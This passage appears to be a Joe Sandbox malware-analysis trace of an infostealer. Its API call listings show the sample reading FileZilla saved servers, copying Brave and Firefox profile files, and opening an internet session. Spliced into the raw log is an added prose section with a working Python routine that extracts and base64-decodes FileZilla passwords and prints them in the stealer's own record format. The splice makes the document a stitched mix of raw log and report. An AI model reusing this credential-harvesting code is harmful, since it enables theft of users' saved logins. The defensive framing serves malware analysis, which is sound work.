                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B1B64
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1B8F
                                • lstrlen.KERNEL32(006D1794), ref: 006B1BA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1BC3
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B1BCF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1BF8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1C25
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B1C30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1C57
                                • lstrlen.KERNEL32(006D1794), ref: 006B1C69
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1C8B
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B1C97
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1CC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1CEF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B1CFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1D21
                                • lstrlen.KERNEL32(006D1794), ref: 006B1D33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1D55
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B1D61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1D8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1DB9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B1DC4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1DED
                                • lstrlen.KERNEL32(006D1794), ref: 006B1E19
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1E36
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B1E42
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1E68
                                • lstrlen.KERNEL32(0133D690), ref: 006B1E7E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1EB2
                                • lstrlen.KERNEL32(006D1794), ref: 006B1EC6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1EE3
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B1EEF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1F15
                                • lstrlen.KERNEL32(0133DC20), ref: 006B1F2B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1F5F
                                • lstrlen.KERNEL32(006D1794), ref: 006B1F73
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1F90
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B1F9C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1FC2
                                • lstrlen.KERNEL32(0132A468), ref: 006B1FD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B2000
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B200B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B2036
                                • lstrlen.KERNEL32(006D1794), ref: 006B2048
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B2067
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B2073
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B2098
                                • lstrlen.KERNEL32(?), ref: 006B20AC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B20D0
                                • lstrcat.KERNEL32(00000000,?), ref: 006B20DE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B2103
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B213F
                                • lstrlen.KERNEL32(0133D7E0), ref: 006B214E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B2176
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B2181
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                • String ID: \*.*
                                • API String ID: 712834838-1173974218
                                • Opcode ID: 773ea1d5cc3f681e4ad2926a09706c0702cc8c8058e8f67e6308146b4f3c8db6
                                • Instruction ID: 598b207b1ef388892d0ec4ad67f52dc4cb5e0ef7a009a0b52a226ccc262d2d5c
                                • Opcode Fuzzy Hash: 773ea1d5cc3f681e4ad2926a09706c0702cc8c8058e8f67e6308146b4f3c8db6
                                • Instruction Fuzzy Hash: AB624EB1A12617ABCB21BB69DC68AEFB7BBBF42700F440129F90597251DB34DD41CB90
                                APIs
                                • wsprintfA.USER32 ref: 006B392C
                                • FindFirstFileA.KERNEL32(?,?), ref: 006B3943
                                • StrCmpCA.SHLWAPI(?,006D17A0), ref: 006B396C
                                • StrCmpCA.SHLWAPI(?,006D17A4), ref: 006B3986
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B39BF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B39E7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B39F2
                                • lstrlen.KERNEL32(006D1794), ref: 006B39FD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3A1A
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B3A26
                                • lstrlen.KERNEL32(?), ref: 006B3A33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3A53
                                • lstrcat.KERNEL32(00000000,?), ref: 006B3A61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3A8A
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B3ACE
                                • lstrlen.KERNEL32(?), ref: 006B3AD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3B05
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B3B10
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3B36
                                • lstrlen.KERNEL32(006D1794), ref: 006B3B48
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3B6A
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B3B76
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3B9E
                                • lstrlen.KERNEL32(?), ref: 006B3BB2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3BD2
                                • lstrcat.KERNEL32(00000000,?), ref: 006B3BE0
                                • lstrlen.KERNEL32(01339358), ref: 006B3C0B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3C31
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B3C3C
                                • lstrlen.KERNEL32(013393B8), ref: 006B3C5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3C84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B3C8F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3CB7
                                • lstrlen.KERNEL32(006D1794), ref: 006B3CC9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3CE8
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B3CF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3D1A
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B3D47
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B3D52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3D79
                                • lstrlen.KERNEL32(006D1794), ref: 006B3D8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3DAD
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B3DB9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3DE2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3E11
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B3E1C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3E43
                                • lstrlen.KERNEL32(006D1794), ref: 006B3E55
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3E77
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B3E83
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3EAC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3EDB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B3EE6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3F0D
                                • lstrlen.KERNEL32(006D1794), ref: 006B3F1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3F41
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B3F4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3F75
                                • lstrlen.KERNEL32(?), ref: 006B3F89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3FA9
                                • lstrcat.KERNEL32(00000000,?), ref: 006B3FB7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3FE0
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B401F
                                • lstrlen.KERNEL32(0133D7E0), ref: 006B402E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B4056
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B4061
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B408A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B40CE
                                • lstrcat.KERNEL32(00000000), ref: 006B40DB
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006B42D9
                                • FindClose.KERNEL32(00000000), ref: 006B42E8
                                Strings
                                 Memory Dump Source
                                 • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 1006159827-1013718255
                                • Opcode ID: 480e1b57a3451b790a12b56c97aeacf9c05e43c06bd65c61346ab8cdc9312478
                                • Instruction ID: 7e975c90b3953e0279f5e3f27ad6ccd66784be4b8f325efc2a923888ed3fe85c
                                • Opcode Fuzzy Hash: 480e1b57a3451b790a12b56c97aeacf9c05e43c06bd65c61346ab8cdc9312478
                                • Instruction Fuzzy Hash: 616292B1A11626ABCB21BF69DC58AEEB7BBBF41700F044229F845A7351DB34DD41CB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B6995
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 006B69C8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6A29
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B6A34
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6A5D
                                • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 006B6A77
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6A99
                                • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 006B6AA5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6AD0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6B00
                                • LocalAlloc.KERNEL32(00000040,?), ref: 006B6B35
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B6B9D
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B6BCD
                                Strings
                                 Memory Dump Source
                                 • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true (same associated dump set as listed for the first entry above)
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 313953988-555421843
                                • Opcode ID: d30c42ce03131335a97ef648cf7466133692aca65cfab2835107b2e58c9d06ca
                                • Instruction ID: 67c2665b46e9b02b0399b55527ee51b53b3ee8a117e242332019e4dfde834aa0
                                • Opcode Fuzzy Hash: d30c42ce03131335a97ef648cf7466133692aca65cfab2835107b2e58c9d06ca
                                • Instruction Fuzzy Hash: B542BFB0A01216ABCB11BBB9DC59AEEBBBBBF45700F044519F905E7251DB38DD41CBA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006ADBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006ADBEF
                                • lstrlen.KERNEL32(006D4CA8), ref: 006ADBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADC17
                                • lstrcat.KERNEL32(00000000,006D4CA8), ref: 006ADC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADC4C
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006ADC8F
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006ADCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006ADCD0
                                • StrCmpCA.SHLWAPI(?,006D17A0), ref: 006ADCF0
                                • StrCmpCA.SHLWAPI(?,006D17A4), ref: 006ADD0A
                                • lstrlen.KERNEL32(006CCFEC), ref: 006ADD1D
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006ADD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006ADD7B
                                • lstrlen.KERNEL32(006D1794), ref: 006ADD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADDA3
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006ADDAF
                                • lstrlen.KERNEL32(?), ref: 006ADDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 006ADDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADE19
                                • lstrlen.KERNEL32(006D1794), ref: 006ADE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006ADE6F
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006ADE7B
                                • lstrlen.KERNEL32(01339218), ref: 006ADE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006ADEBB
                                • lstrlen.KERNEL32(006D1794), ref: 006ADEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 006ADEE6
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006ADEF2
                                • lstrlen.KERNEL32(01339398), ref: 006ADF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006ADF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADFA5
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006ADFB1
                                • lstrlen.KERNEL32(01339218), ref: 006ADFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006ADFF4
                                • lstrlen.KERNEL32(006D1794), ref: 006ADFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE022
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006AE02E
                                • lstrlen.KERNEL32(01339398), ref: 006AE03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006AE06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 006AE0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 006AE0E7
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006AE11F
                                • lstrlen.KERNEL32(0133D7E0), ref: 006AE12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE155
                                • lstrcat.KERNEL32(00000000,?), ref: 006AE15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE19F
                                • lstrcat.KERNEL32(00000000), ref: 006AE1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 006AE1F9
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006AE22F
                                • lstrlen.KERNEL32(01339358), ref: 006AE23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE261
                                • lstrcat.KERNEL32(00000000,01339358), ref: 006AE269
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006AE988
                                • FindClose.KERNEL32(00000000), ref: 006AE997
                                Strings
                                 Memory Dump Source
                                 • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true (same associated dump set as listed for the first entry above)
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                • String ID: Brave$Preferences$\Brave\Preferences
                                • API String ID: 1346089424-1230934161
                                • Opcode ID: 00017950428cb19917884e7b006b3abf18d8486f3a00aa35297155125ef40fe3
                                • Instruction ID: 6bde3a7321f04b56905fea4a767700671aef0c2239ced42ea327338e3d80cdd6
                                • Opcode Fuzzy Hash: 00017950428cb19917884e7b006b3abf18d8486f3a00aa35297155125ef40fe3
                                • Instruction Fuzzy Hash: 68527B70A112169BCB21FF69DC99AAEB7BABF46700F04416DF84A97751EB34DC018F90
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A60FF
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A6152
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A6185
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A61B5
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A61F0
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A6223
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006A6233
                                Strings
                                 Memory Dump Source
                                 • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true (same associated dump set as listed for the first entry above)
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: b7272a25136b95c8b89d5fc5249b6b215e29e50a56b2179b35c6cc1d91713aa7
                                • Instruction ID: 0078beb7c5f1765df916d9aa7574ca5b2d16b7d7f9e4eae4b1db03bfb4ba6ecb
                                • Opcode Fuzzy Hash: b7272a25136b95c8b89d5fc5249b6b215e29e50a56b2179b35c6cc1d91713aa7
                                • Instruction Fuzzy Hash: D9527C71A112169BCB61FFA9DC49BAEB7BAFF05300F094129F909A7251DB34ED018F94
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B6B9D
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B6BCD
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B6BFD
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B6C2F
                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 006B6C3C
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006B6C43
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 006B6C5A
                                • lstrlen.KERNEL32(00000000), ref: 006B6C65
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6CA8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6CCF
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 006B6CE2
                                • lstrlen.KERNEL32(00000000), ref: 006B6CED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6D30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6D57
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 006B6D6A
                                • lstrlen.KERNEL32(00000000), ref: 006B6D75
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6DB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6DDF
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 006B6DF2
                                • lstrlen.KERNEL32(00000000), ref: 006B6E01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6E49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6E71
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 006B6E94
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 006B6EA8
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 006B6EC9
                                • LocalFree.KERNEL32(00000000), ref: 006B6ED4
                                • lstrlen.KERNEL32(?), ref: 006B6F6E
                                • lstrlen.KERNEL32(?), ref: 006B6F81
                                Strings
                                 Memory Dump Source
                                 • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true (same associated dump set as listed for the first entry above)
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 2641759534-2314656281
                                • Opcode ID: e414ddfc7dce22a201676580e8c5e5e6e219c541037a639f66c469e5af589bea
                                • Instruction ID: 8f60a80d686d789a4a0f619e8c00017a87b01ea143ec597acba95a6bae591f2b
                                • Opcode Fuzzy Hash: e414ddfc7dce22a201676580e8c5e5e6e219c541037a639f66c469e5af589bea
                                • Instruction Fuzzy Hash: BC02AFB0A51212ABCB10BBB9DC59AEE7BBBBF05700F040559F946E7251DB38DC418BA0
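The routine traced above is a substring scan of FileZilla's recentservers.xml: StrStrA is called for the literal tags <Host>, <Port>, <User> and <Pass encoding="base64">, and the password is then decoded with two CryptStringToBinaryA calls using dwFlags=1 (CRYPT_STRING_BASE64), the first with a NULL output buffer to size a LocalAlloc and the second to decode into it. The earlier entry at 006B6995 shows where the file comes from: SHGetFolderPathA with CSIDL 0x28 (CSIDL_PROFILE) plus the suffix \AppData\Roaming\FileZilla\recentservers.xml. The Python below is an added example, written for this report and not code from the sample or from Joe Sandbox, that reproduces the same scan on a constructed recentservers.xml so an analyst can see exactly what such a file exposes. It generalises beyond the single search visible in the trace by iterating over every <Server> block. The output record reuses the five labels from the string list (browser: FileZilla, profile: null, url:, login:, password:), but the line order and the host:port form of url: are assumptions. The second constructed server entry has a plain <Pass> tag without the encoding attribute; a search for the exact tag string does not match it, which the example surfaces as a missing password rather than a crash.

```python
import base64
import binascii
from dataclasses import dataclass
from typing import List, Optional

# Constructed FileZilla recentservers.xml (not taken from the analysed host);
# hosts and credentials are placeholders. On a real machine the file lives at
# SHGetFolderPathA(CSIDL_PROFILE = 0x28) + "\AppData\Roaming\FileZilla\recentservers.xml".
SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>alice</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>bob</User>
      <Pass>plaintext-legacy</Pass>
      <Logontype>1</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""

# Tag strings exactly as they appear in the trace's StrStrA calls.
TAG_HOST = "<Host>"
TAG_PORT = "<Port>"
TAG_USER = "<User>"
TAG_PASS_B64 = '<Pass encoding="base64">'


@dataclass
class FtpCredential:
    host: str
    port: str
    user: str
    password: Optional[str]  # None when no base64 <Pass> tag was found


def tag_value(buf: str, tag: str) -> Optional[str]:
    """StrStrA-style scan: text after the first occurrence of `tag` up to the next '<'.
    Returns None when the exact tag string is absent, mirroring a NULL from StrStrA."""
    i = buf.find(tag)
    if i < 0:
        return None
    start = i + len(tag)
    end = buf.find("<", start)
    return buf[start:end] if end >= 0 else buf[start:]


def decode_b64(value: str) -> Optional[str]:
    """Equivalent of CryptStringToBinaryA with dwFlags=1 (CRYPT_STRING_BASE64):
    whitespace is tolerated, malformed input yields None (the API call would fail)."""
    try:
        raw = base64.b64decode("".join(value.split()))
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")


def parse_recentservers(xml_text: str) -> List[FtpCredential]:
    """Walk every <Server> block with substring searches, not an XML parser."""
    creds: List[FtpCredential] = []
    pos = 0
    while True:
        start = xml_text.find("<Server>", pos)
        if start < 0:
            break
        end = xml_text.find("</Server>", start)
        if end < 0:
            end = len(xml_text)
        block = xml_text[start:end]
        host = tag_value(block, TAG_HOST)
        if host is not None:
            b64 = tag_value(block, TAG_PASS_B64)
            creds.append(FtpCredential(
                host=host,
                port=tag_value(block, TAG_PORT) or "",
                user=tag_value(block, TAG_USER) or "",
                password=decode_b64(b64) if b64 is not None else None,
            ))
        pos = end
    return creds


def format_record(cred: FtpCredential) -> str:
    """Record built from the five labels in the trace's string list;
    the line order and the host:port form of `url:` are assumptions."""
    return "\n".join([
        "browser: FileZilla",
        "profile: null",
        f"url: {cred.host}:{cred.port}",
        f"login: {cred.user}",
        f"password: {cred.password if cred.password is not None else ''}",
    ])


if __name__ == "__main__":
    for cred in parse_recentservers(SAMPLE_RECENTSERVERS):
        print(format_record(cred))
        print("---")
```

The practical point for defenders is that FileZilla's base64 "encoding" is not protection: anything that can read the user's profile directory recovers every saved FTP/SFTP credential with a few string searches and a standard base64 decode, which is why CryptStringToBinaryA on recentservers.xml (and sitemanager.xml, which the trace does not show) is a useful behavioural indicator.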
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B4B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B4B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B4B7F
                                • lstrlen.KERNEL32(006D4CA8), ref: 006B4B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B4BA7
                                • lstrcat.KERNEL32(00000000,006D4CA8), ref: 006B4BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B4BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006B4BFA
                                Strings
                                 Memory Dump Source
                                 • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true (same associated dump set as listed for the first entry above)
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: prefs.js
                                • API String ID: 2567437900-3783873740
                                • Opcode ID: 484540a502a741099c32d8bab1cf1d49caa0742fc6077f071fca140692d3b385
                                • Instruction ID: d3d8a1f4567b9c114ae9ce3ec76c1b4cf0375dbee43293cd4265ff4f3bd98bc7
                                • Opcode Fuzzy Hash: 484540a502a741099c32d8bab1cf1d49caa0742fc6077f071fca140692d3b385
                                • Instruction Fuzzy Hash: EC9252B0A026118FDB24DF29C944BE9B7E6BF45714F1981ADE44A9B362DB35DC82CF40
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B1291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B12B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B12BF
                                • lstrlen.KERNEL32(006D4CA8), ref: 006B12CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B12E7
                                • lstrcat.KERNEL32(00000000,006D4CA8), ref: 006B12F3
